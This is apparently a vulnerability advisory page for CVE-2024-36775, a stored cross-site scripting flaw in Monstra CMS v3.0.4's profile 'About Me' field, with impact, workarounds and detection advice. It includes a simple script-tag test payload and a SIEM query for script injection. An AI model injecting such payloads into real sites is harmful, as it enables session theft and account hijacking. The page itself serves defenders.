CVE-2024-36775 – This cross-site scripting (XSS) vulnerability i... (How to Fix)

Q: What is the severity of CVE-2024-36775?

CVE-2024-36775 has a CVSS score of 5.4 (MEDIUM). This cross-site scripting (XSS) vulnerability in Monstra CMS v3.0.4 allows attackers to inject malicious scripts into the 'About Me' field of user profiles. When other users view these profiles, the scripts execute in their browsers, potentially stealing session cookies or performing unauthorized actions. All Monstra CMS v3.0.4 installations with user profile functionality are affected.

📋 TL;DR

This cross-site scripting (XSS) vulnerability in Monstra CMS v3.0.4 allows attackers to inject malicious scripts into the 'About Me' field of user profiles. When other users view these profiles, the scripts execute in their browsers, potentially stealing session cookies or performing unauthorized actions. All Monstra CMS v3.0.4 installations with user profile functionality are affected.

💻 Affected Systems

Products:

Monstra CMS

Versions: v3.0.4

Operating Systems: All

Default Config Vulnerable: ⚠️ Yes

Notes: Only affects installations with user registration and profile editing enabled.

📦 What is this software?

Monstra by Monstra

View all CVEs affecting Monstra →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Attackers could steal administrator session cookies, gain administrative access, deface websites, or install backdoors for persistent control.

🟠

Likely Case

Attackers steal user session cookies to hijack accounts, perform unauthorized actions, or redirect users to malicious sites.

🟢

If Mitigated

With proper input validation and output encoding, the vulnerability is prevented, though the underlying code flaw remains.

🌐 Internet-Facing: HIGH

🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: LIKELY

Unauthenticated Exploit: ✅ No

Complexity: LOW

Exploitation requires user registration or existing account access to edit profile. Public proof-of-concept exists in GitHub repository.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Not available

Vendor Advisory: Not available

Restart Required: No

Instructions:

No official patch available. Consider upgrading to a newer version if available, or implement workarounds.

🔧 Temporary Workarounds

Input Validation and Output Encoding

all

Implement server-side validation to sanitize 'About Me' field input and encode output to prevent script execution.

Edit relevant PHP files to add htmlspecialchars() or similar functions around user input output

Disable User Profile Editing

all

Temporarily disable the Edit Profile functionality until a proper fix is implemented.

Modify Monstra CMS configuration or code to remove/disable profile editing links

🧯 If You Can't Patch

Implement web application firewall (WAF) rules to block XSS payloads in user profile data
Monitor user profile content for suspicious script tags and alert on detection

🔍 How to Verify

Check if Vulnerable:

Test by entering <script>alert('XSS')</script> in the 'About Me' field of a user profile and viewing the profile to see if script executes.

Check Version:

Check Monstra CMS version in admin panel or via file inspection of version files.

Verify Fix Applied:

After implementing workarounds, repeat the test with the same payload to confirm script does not execute.

📡 Detection & Monitoring

Log Indicators:

Unusual profile updates with script tags or JavaScript code in 'About Me' field

Network Indicators:

HTTP requests containing script payloads in profile update parameters

SIEM Query:

source="web_logs" AND (uri="/profile/edit" OR uri="/profile/update") AND (body CONTAINS "<script>" OR body CONTAINS "javascript:")

📊 Metadata

CVE ID: CVE-2024-36775

CVSS v3 Score: 5.4 (MEDIUM)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

CWE: CWE-79

Published: June 6, 2024

Last Updated: November 21, 2024

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2024-36775, you might also want to check these: